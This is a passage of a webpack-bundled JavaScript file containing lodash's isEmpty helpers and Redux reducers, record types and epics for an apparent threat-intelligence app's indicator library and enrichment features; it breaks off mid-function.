var freeSelf = typeof self == 'object' && self && self.Object === Object && self;

/** Used as a reference to the global object. */
var root = freeGlobal || freeSelf || Function('return this')();

/** Detect free variable `exports`. */
var freeExports = typeof exports == 'object' && exports && !exports.nodeType && exports;

/** Detect free variable `module`. */
var freeModule = freeExports && typeof module == 'object' && module && !module.nodeType && module;

/** Detect the popular CommonJS extension `module.exports`. */
var moduleExports = freeModule && freeModule.exports === freeExports;

/**
 * Gets the value at `key` of `object`.
 *
 * @private
 * @param {Object} [object] The object to query.
 * @param {string} key The key of the property to get.
 * @returns {*} Returns the property value.
 */
function getValue(object, key) {
  return object == null ? undefined : object[key];
}

/**
 * Checks if `value` is a host object in IE < 9.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a host object, else `false`.
 */
function isHostObject(value) {
  // Many host objects are `Object` objects that can coerce to strings
  // despite having improperly defined `toString` methods.
  var result = false;
  if (value != null && typeof value.toString != 'function') {
    try {
      result = !!(value + '');
    } catch (e) {}
  }
  return result;
}

/**
 * Creates a unary function that invokes `func` with its argument transformed.
 *
 * @private
 * @param {Function} func The function to wrap.
 * @param {Function} transform The argument transform.
 * @returns {Function} Returns the new function.
 */
function overArg(func, transform) {
  return function(arg) {
    return func(transform(arg));
  };
}

/** Used for built-in method references. */
var funcProto = Function.prototype,
    objectProto = Object.prototype;

/** Used to detect overreaching core-js shims. */
var coreJsData = root['__core-js_shared__'];

/** Used to detect methods masquerading as native. */
var maskSrcKey = (function() {
  var uid = /[^.]+$/.exec(coreJsData && coreJsData.keys && coreJsData.keys.IE_PROTO || '');
  return uid ? ('Symbol(src)_1.' + uid) : '';
}());

/** Used to resolve the decompiled source of functions. */
var funcToString = funcProto.toString;

/** Used to check objects for own properties. */
var hasOwnProperty = objectProto.hasOwnProperty;

/**
 * Used to resolve the
 * [`toStringTag`](http://ecma-international.org/ecma-262/7.0/#sec-object.prototype.tostring)
 * of values.
 */
var objectToString = objectProto.toString;

/** Used to detect if a method is native. */
var reIsNative = RegExp('^' +
  funcToString.call(hasOwnProperty).replace(reRegExpChar, '\\$&')
  .replace(/hasOwnProperty|(function).*?(?=\\\()| for .+?(?=\\\])/g, '$1.*?') + '$'
);

/** Built-in value references. */
var Buffer = moduleExports ? root.Buffer : undefined,
    propertyIsEnumerable = objectProto.propertyIsEnumerable;

/* Built-in method references for those with the same name as other `lodash` methods. */
var nativeIsBuffer = Buffer ? Buffer.isBuffer : undefined,
    nativeKeys = overArg(Object.keys, Object);

/* Built-in method references that are verified to be native. */
var DataView = getNative(root, 'DataView'),
    Map = getNative(root, 'Map'),
    Promise = getNative(root, 'Promise'),
    Set = getNative(root, 'Set'),
    WeakMap = getNative(root, 'WeakMap');

/** Detect if properties shadowing those on `Object.prototype` are non-enumerable. */
var nonEnumShadows = !propertyIsEnumerable.call({ 'valueOf': 1 }, 'valueOf');

/** Used to detect maps, sets, and weakmaps. */
var dataViewCtorString = toSource(DataView),
    mapCtorString = toSource(Map),
    promiseCtorString = toSource(Promise),
    setCtorString = toSource(Set),
    weakMapCtorString = toSource(WeakMap);

/**
 * The base implementation of `getTag`.
 *
 * @private
 * @param {*} value The value to query.
 * @returns {string} Returns the `toStringTag`.
 */
function baseGetTag(value) {
  return objectToString.call(value);
}

/**
 * The base implementation of `_.isNative` without bad shim checks.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a native function,
 *  else `false`.
 */
function baseIsNative(value) {
  if (!isObject(value) || isMasked(value)) {
    return false;
  }
  var pattern = (isFunction(value) || isHostObject(value)) ? reIsNative : reIsHostCtor;
  return pattern.test(toSource(value));
}

/**
 * Gets the native function at `key` of `object`.
 *
 * @private
 * @param {Object} object The object to query.
 * @param {string} key The key of the method to get.
 * @returns {*} Returns the function if it's native, else `undefined`.
 */
function getNative(object, key) {
  var value = getValue(object, key);
  return baseIsNative(value) ? value : undefined;
}

/**
 * Gets the `toStringTag` of `value`.
 *
 * @private
 * @param {*} value The value to query.
 * @returns {string} Returns the `toStringTag`.
 */
var getTag = baseGetTag;

// Fallback for data views, maps, sets, and weak maps in IE 11,
// for data views in Edge < 14, and promises in Node.js.
if ((DataView && getTag(new DataView(new ArrayBuffer(1))) != dataViewTag) ||
    (Map && getTag(new Map) != mapTag) ||
    (Promise && getTag(Promise.resolve()) != promiseTag) ||
    (Set && getTag(new Set) != setTag) ||
    (WeakMap && getTag(new WeakMap) != weakMapTag)) {
  getTag = function(value) {
    var result = objectToString.call(value),
        Ctor = result == objectTag ? value.constructor : undefined,
        ctorString = Ctor ? toSource(Ctor) : undefined;

    if (ctorString) {
      switch (ctorString) {
        case dataViewCtorString: return dataViewTag;
        case mapCtorString: return mapTag;
        case promiseCtorString: return promiseTag;
        case setCtorString: return setTag;
        case weakMapCtorString: return weakMapTag;
      }
    }
    return result;
  };
}

/**
 * Checks if `func` has its source masked.
 *
 * @private
 * @param {Function} func The function to check.
 * @returns {boolean} Returns `true` if `func` is masked, else `false`.
 */
function isMasked(func) {
  return !!maskSrcKey && (maskSrcKey in func);
}

/**
 * Checks if `value` is likely a prototype object.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a prototype, else `false`.
 */
function isPrototype(value) {
  var Ctor = value && value.constructor,
      proto = (typeof Ctor == 'function' && Ctor.prototype) || objectProto;

  return value === proto;
}

/**
 * Converts `func` to its source code.
 *
 * @private
 * @param {Function} func The function to process.
 * @returns {string} Returns the source code.
 */
function toSource(func) {
  if (func != null) {
    try {
      return funcToString.call(func);
    } catch (e) {}
    try {
      return (func + '');
    } catch (e) {}
  }
  return '';
}

/**
 * Checks if `value` is likely an `arguments` object.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an `arguments` object,
 *  else `false`.
 * @example
 *
 * _.isArguments(function() { return arguments; }());
 * // => true
 *
 * _.isArguments([1, 2, 3]);
 * // => false
 */
function isArguments(value) {
  // Safari 8.1 makes `arguments.callee` enumerable in strict mode.
  return isArrayLikeObject(value) && hasOwnProperty.call(value, 'callee') &&
    (!propertyIsEnumerable.call(value, 'callee') || objectToString.call(value) == argsTag);
}

/**
 * Checks if `value` is classified as an `Array` object.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an array, else `false`.
 * @example
 *
 * _.isArray([1, 2, 3]);
 * // => true
 *
 * _.isArray(document.body.children);
 * // => false
 *
 * _.isArray('abc');
 * // => false
 *
 * _.isArray(_.noop);
 * // => false
 */
var isArray = Array.isArray;

/**
 * Checks if `value` is array-like. A value is considered array-like if it's
 * not a function and has a `value.length` that's an integer greater than or
 * equal to `0` and less than or equal to `Number.MAX_SAFE_INTEGER`.
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is array-like, else `false`.
 * @example
 *
 * _.isArrayLike([1, 2, 3]);
 * // => true
 *
 * _.isArrayLike(document.body.children);
 * // => true
 *
 * _.isArrayLike('abc');
 * // => true
 *
 * _.isArrayLike(_.noop);
 * // => false
 */
function isArrayLike(value) {
  return value != null && isLength(value.length) && !isFunction(value);
}

/**
 * This method is like `_.isArrayLike` except that it also checks if `value`
 * is an object.
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an array-like object,
 *  else `false`.
 * @example
 *
 * _.isArrayLikeObject([1, 2, 3]);
 * // => true
 *
 * _.isArrayLikeObject(document.body.children);
 * // => true
 *
 * _.isArrayLikeObject('abc');
 * // => false
 *
 * _.isArrayLikeObject(_.noop);
 * // => false
 */
function isArrayLikeObject(value) {
  return isObjectLike(value) && isArrayLike(value);
}

/**
 * Checks if `value` is a buffer.
 *
 * @static
 * @memberOf _
 * @since 4.3.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a buffer, else `false`.
 * @example
 *
 * _.isBuffer(new Buffer(2));
 * // => true
 *
 * _.isBuffer(new Uint8Array(2));
 * // => false
 */
var isBuffer = nativeIsBuffer || stubFalse;

/**
 * Checks if `value` is an empty object, collection, map, or set.
 *
 * Objects are considered empty if they have no own enumerable string keyed
 * properties.
 *
 * Array-like values such as `arguments` objects, arrays, buffers, strings, or
 * jQuery-like collections are considered empty if they have a `length` of `0`.
 * Similarly, maps and sets are considered empty if they have a `size` of `0`.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is empty, else `false`.
 * @example
 *
 * _.isEmpty(null);
 * // => true
 *
 * _.isEmpty(true);
 * // => true
 *
 * _.isEmpty(1);
 * // => true
 *
 * _.isEmpty([1, 2, 3]);
 * // => false
 *
 * _.isEmpty({ 'a': 1 });
 * // => false
 */
function isEmpty(value) {
  if (isArrayLike(value) &&
      (isArray(value) || typeof value == 'string' ||
        typeof value.splice == 'function' || isBuffer(value) || isArguments(value))) {
    return !value.length;
  }
  var tag = getTag(value);
  if (tag == mapTag || tag == setTag) {
    return !value.size;
  }
  if (nonEnumShadows || isPrototype(value)) {
    return !nativeKeys(value).length;
  }
  for (var key in value) {
    if (hasOwnProperty.call(value, key)) {
      return false;
    }
  }
  return true;
}

/**
 * Checks if `value` is classified as a `Function` object.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a function, else `false`.
 * @example
 *
 * _.isFunction(_);
 * // => true
 *
 * _.isFunction(/abc/);
 * // => false
 */
function isFunction(value) {
  // The use of `Object#toString` avoids issues with the `typeof` operator
  // in Safari 8-9 which returns 'object' for typed array and other constructors.
  var tag = isObject(value) ? objectToString.call(value) : '';
  return tag == funcTag || tag == genTag;
}

/**
 * Checks if `value` is a valid array-like length.
 *
 * **Note:** This method is loosely based on
 * [`ToLength`](http://ecma-international.org/ecma-262/7.0/#sec-tolength).
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a valid length, else `false`.
 * @example
 *
 * _.isLength(3);
 * // => true
 *
 * _.isLength(Number.MIN_VALUE);
 * // => false
 *
 * _.isLength(Infinity);
 * // => false
 *
 * _.isLength('3');
 * // => false
 */
function isLength(value) {
  return typeof value == 'number' &&
    value > -1 && value % 1 == 0 && value <= MAX_SAFE_INTEGER;
}

/**
 * Checks if `value` is the
 * [language type](http://www.ecma-international.org/ecma-262/7.0/#sec-ecmascript-language-types)
 * of `Object`. (e.g. arrays, functions, objects, regexes, `new Number(0)`, and `new String('')`)
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an object, else `false`.
 * @example
 *
 * _.isObject({});
 * // => true
 *
 * _.isObject([1, 2, 3]);
 * // => true
 *
 * _.isObject(_.noop);
 * // => true
 *
 * _.isObject(null);
 * // => false
 */
function isObject(value) {
  var type = typeof value;
  return !!value && (type == 'object' || type == 'function');
}

/**
 * Checks if `value` is object-like. A value is object-like if it's not `null`
 * and has a `typeof` result of "object".
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is object-like, else `false`.
 * @example
 *
 * _.isObjectLike({});
 * // => true
 *
 * _.isObjectLike([1, 2, 3]);
 * // => true
 *
 * _.isObjectLike(_.noop);
 * // => false
 *
 * _.isObjectLike(null);
 * // => false
 */
function isObjectLike(value) {
  return !!value && typeof value == 'object';
}

/**
 * This method returns `false`.
 *
 * @static
 * @memberOf _
 * @since 4.13.0
 * @category Util
 * @returns {boolean} Returns `false`.
 * @example
 *
 * _.times(2, _.stubFalse);
 * // => [false, false]
 */
function stubFalse() {
  return false;
}

module.exports = isEmpty;

/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(17), __webpack_require__(118)(module)))

/***/ }),
/* 3198 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export metadata */
/* unused harmony export library */
/* unused harmony export enrichment */
/* unused harmony export tagCollection */
/* unused harmony export exportLoading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_modules_tags_types__ = __webpack_require__(513);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__action_types_js__ = __webpack_require__(241);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_modules_tags_action_types__ = __webpack_require__(364);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__constellation_action_types__ = __webpack_require__(143);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__types__ = __webpack_require__(3199);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__utils__ = __webpack_require__(762);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__action_types__ = __webpack_require__(241);














/* Map the metadata to Immutable. Mainly complicated because we're using these Records to type
 * the various objects, like IndicatorTag and the Metadata Object itself. */
var saveMetadataFromJson = function saveMetadataFromJson(metadata) {
  return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(metadata).reduce(function (newState, rawMetadata) {
    var metadata = Object(__WEBPACK_IMPORTED_MODULE_7__types__["b" /* DefaultIndicatorMetadata */])(rawMetadata).set('loading', false).update('enclaves', function (enclaves) {
      return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(enclaves);
    }).update('tags', function (tags) {
      return tags.map(__WEBPACK_IMPORTED_MODULE_3_modules_tags_types__["d" /* IndicatorTag */]);
    });
    return newState.set(rawMetadata.get('id'), metadata);
  }, Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])());
};

/* Map request for metadata to store in state, mainly to establish loading state. */
var saveMetadataFromRequest = function saveMetadataFromRequest(data) {
  return data.reduce(function (newState, ioc) {
    return newState.set(ioc.id, Object(__WEBPACK_IMPORTED_MODULE_7__types__["b" /* DefaultIndicatorMetadata */])(ioc).set('loading', true));
  }, Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])());
};

/* A cache of indicator metadata. Operates similar to report metadata. */
var metadata = function metadata() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["o" /* FETCH_INDICATOR_LIBRARY_SUCCESS */]:
      return state.merge(saveMetadataFromRequest(payload.items || []));
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["r" /* FETCH_INDICATOR_METADATA_SUCCESS */]:
      return state.merge(saveMetadataFromJson(payload));
    case __WEBPACK_IMPORTED_MODULE_5_modules_tags_action_types__["p" /* REMOVE_INDICATOR_TAG_SUCCESS */]:
      return state.updateIn([payload.id, 'tags'], function (tags) {
        return tags.filter(function (tag) {
          return tag.get('guid') !== payload.guid;
        });
      });
    case __WEBPACK_IMPORTED_MODULE_6__constellation_action_types__["H" /* SAVE_NOTE_SUCCESS */]:
      return state.updateIn([payload.nodeGuid, 'noteCount'], function (count) {
        return count + 1;
      });
    case __WEBPACK_IMPORTED_MODULE_6__constellation_action_types__["k" /* DELETE_NOTE_SUCCESS */]:
      return state.updateIn([payload.nodeGuid, 'noteCount'], function (count) {
        return count - 1;
      });
    default:
      return state;
  }
};

/* Store for the IOC library */
var library = function library() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_7__types__["c" /* DefaultLibrary */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["a" /* CLEAR_INDICATORS */]:
      return state.set('indicatorList', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])());
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["w" /* REFRESH_INDICATOR_LIST */]:
      return state.set('currentDisplayRange', __WEBPACK_IMPORTED_MODULE_7__types__["e" /* defaultRange */]).set('loading', true).set('indicatorList', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])());
    case __WEBPACK_IMPORTED_MODULE_9__action_types__["D" /* STORE_INDICATOR_LOCAL */]:
      var indicatorId = payload.has('id') ? payload.get('id') : payload.get('guid');
      return state
      // $FlowIssue: update is a method of Record, Immutable 4 will fix this.
      .update('indicatorList', function (indicatorList) {
        return indicatorList.set(indicatorId, payload);
      });
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["m" /* FETCH_INDICATOR_LIBRARY */]:
      return state.set('loading', true).set('indicatorList', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])());
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["v" /* PAGINATE_INDICATOR_LIST */]:
      return state.set('loading', true);
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["C" /* SET_TIME_RANGE_SUCCESS */]:
      return state.set('currentDisplayRange', payload);
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["A" /* SET_INDICATOR_FETCH_OPTIONS */]:
      // $FlowIssue: update is a method of Record, Immutable 4 will fix this.
      return state.update('fetchParams', function (params) {
        return params.merge(Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(payload));
      });
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["o" /* FETCH_INDICATOR_LIBRARY_SUCCESS */]:
      return state.set('loading', false).set('error', false)
      // $FlowIssue: update is a method of Record, Immutable 4 will fix this.
      .update('fetchParams', function (options) {
        return options.set('hasNext', payload.hasNext).set('page', payload.page);
      }).update('indicatorList', function (list) {
        return Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(payload.items).reduce(function (newList, item) {
          return newList.set(item.get('id'), item);
        }, list);
      });
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["n" /* FETCH_INDICATOR_LIBRARY_FAILURE */]:
      return state.set('loading', false).set('error', true);
    default:
      return state;
  }
};

/* The full map of IOC enrichment */
var enrichment = function enrichment() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_7__types__["a" /* DefaultEnrichment */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["s" /* FETCH_IOC_ENRICHMENT */]:
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["x" /* REVERT_CLASSIFICATION */]:
      return state.set('loading', true);
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["z" /* REVERT_CLASSIFICATION_SUCCESS */]:
      return state.set('loading', false);
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["u" /* FETCH_IOC_ENRICHMENT_SUCCESS */]:
      return state.set('loading', false).setIn(['data', payload.id], payload.enrichment);
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["t" /* FETCH_IOC_ENRICHMENT_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["y" /* REVERT_CLASSIFICATION_FAILURE */]:
      return state.set('error', true).set('loading', false);
    default:
      return state;
  }
};

/* Store to hold most recent indicators for a given tag. Refreshed whenever a new tag node is selected
 * in the constellation. Therefore, indicators in this store always correspond to the currently selected
 * tag. */
var tagCollection = function tagCollection() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_7__types__["d" /* DefaultTagCollection */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["j" /* FETCH_INDICATORS_FOR_TAG */]:
      return state.set('loading', true).set('indicators', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])());
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["l" /* FETCH_INDICATORS_FOR_TAG_SUCCESS */]:
      return state.set('loading', false).set('indicators', payload);
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["k" /* FETCH_INDICATORS_FOR_TAG_FAILURE */]:
      return state.set('loading', false).set('indicators', Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])());
    default:
      return state;
  }
};

var exportLoading = function exportLoading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["g" /* EXPORT_INDICATORS_LIST */]:
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["d" /* EXPORT_INDICATORS_FOR_TAG */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["i" /* EXPORT_INDICATORS_LIST_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["h" /* EXPORT_INDICATORS_LIST_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["f" /* EXPORT_INDICATORS_FOR_TAG_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_4__action_types_js__["e" /* EXPORT_INDICATORS_FOR_TAG_FAILURE */]:
      return false;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_1_redux_immutable__["combineReducers"])({
  metadata: metadata,
  library: library,
  enrichment: enrichment,
  tagCollection: tagCollection,
  exportLoading: exportLoading
}));

/***/ }),
/* 3199 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export getDaysBack */
/* unused harmony export DefaultFetchParams */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "e", function() { return defaultRange; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "c", function() { return DefaultLibrary; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return DefaultEnrichment; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return DefaultIndicatorMetadata; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "d", function() { return DefaultTagCollection; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);



var getDaysBack = function getDaysBack(days) {
  return Date.now() - 1000 * 60 * 60 * 24 * days;
};

var DefaultFetchParams = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  page: 1,
  startPage: 1,
  to: Date.now(),
  from: getDaysBack(7),
  hasNext: false,
  pageSize: 50,
  tags: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
  excludedTags: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
  enclaveFilters: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])()
});

var defaultRange = 'Past 7 days';

var DefaultLibrary = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  loading: false,
  error: false,
  indicatorList: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["OrderedMap"])(), // IOC list results
  fetchParams: DefaultFetchParams(), // The current fetch params, including from, to, enclave, & tags
  currentDisplayRange: defaultRange, // The current list range, displayed in readable English
  currentResultRange: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])({ // The current result range, used for paginating results
    from: null,
    to: null
  })
});

var DefaultEnrichment = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  loading: false,
  error: false,
  data: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Map"])()
});

var DefaultIndicatorMetadata = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  loading: false,
  indicatorType: '',
  value: '',
  lastSeen: 0,
  sightings: 0,
  correlationCount: 0,
  noteCount: 0,
  tags: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])(),
  enclaves: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Set"])(),
  priorityLevel: 'LOW'
});

var DefaultTagCollection = Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["Record"])({
  loading: false,
  indicators: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["List"])()
});

/***/ }),
/* 3200 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_router__ = __webpack_require__(98);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_trustar_utils_dashboard__ = __webpack_require__(500);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_trustar_utils_index__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__constants_js__ = __webpack_require__(3201);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__action_types_js__ = __webpack_require__(241);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__actions__ = __webpack_require__(577);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12_modules_insights_getters__ = __webpack_require__(359);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13_modules_tags_types__ = __webpack_require__(513);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_modules_alerts_actions_js__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_15_modules_search_action_types__ = __webpack_require__(284);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_16_modules_search__ = __webpack_require__(253);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_17__utils__ = __webpack_require__(762);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_18__search_epics__ = __webpack_require__(1416);








var debug = __WEBPACK_IMPORTED_MODULE_5_debug___default()('app:modules:indicators:epics'); // eslint-disable-line no-unused-vars















var enrichmentUrl = function enrichmentUrl(value) {
  return Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["querystring"])({ value: value }, __WEBPACK_IMPORTED_MODULE_9__constants_js__["c" /* IOC_ENRICHMENT_ENDPOINT */]);
};

var handleTimeRangeEpic = function handleTimeRangeEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["B" /* SET_TIME_RANGE */]).mergeMap(function () {

    var dateOptions = Object(__WEBPACK_IMPORTED_MODULE_12_modules_insights_getters__["currentTimeFilter"])(store.getState());
    var daysBack = dateOptions.get('daysBack');

    var range = daysBack ? Object(__WEBPACK_IMPORTED_MODULE_7_trustar_utils_dashboard__["b" /* computeDateRangeDaySelection */])(daysBack) : {
      from: dateOptions.get('dateSince'),
      to: dateOptions.get('dateUntil')
    };

    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([Object(__WEBPACK_IMPORTED_MODULE_11__actions__["setFetchOptions"])(range), { type: __WEBPACK_IMPORTED_MODULE_10__action_types_js__["C" /* SET_TIME_RANGE_SUCCESS */], payload: Object(__WEBPACK_IMPORTED_MODULE_7_trustar_utils_dashboard__["a" /* calculateDayRange */])(range.from, range.to) }, Object(__WEBPACK_IMPORTED_MODULE_11__actions__["fetchIndicatorList"])()]);
  });
};

/* Fetches metadata for Indicators[] */
var fetchIndicatorMetadataEpic = function fetchIndicatorMetadataEpic(action$, store, _ref2) {
  var ajax = _ref2.ajax;
  return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].merge(action$.ofType(__WEBPACK_IMPORTED_MODULE_10__action_types_js__["p" /* FETCH_INDICATOR_METADATA */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')), action$.ofType(__WEBPACK_IMPORTED_MODULE_15_modules_search_action_types__["n" /* SEARCH_ENTITIES_SUCCESS */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).map(function (d) {
    return d.get('items');
  })).mergeMap(function (indicators) {
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from(indicators).bufferCount(25).mergeMap(function (batch) {
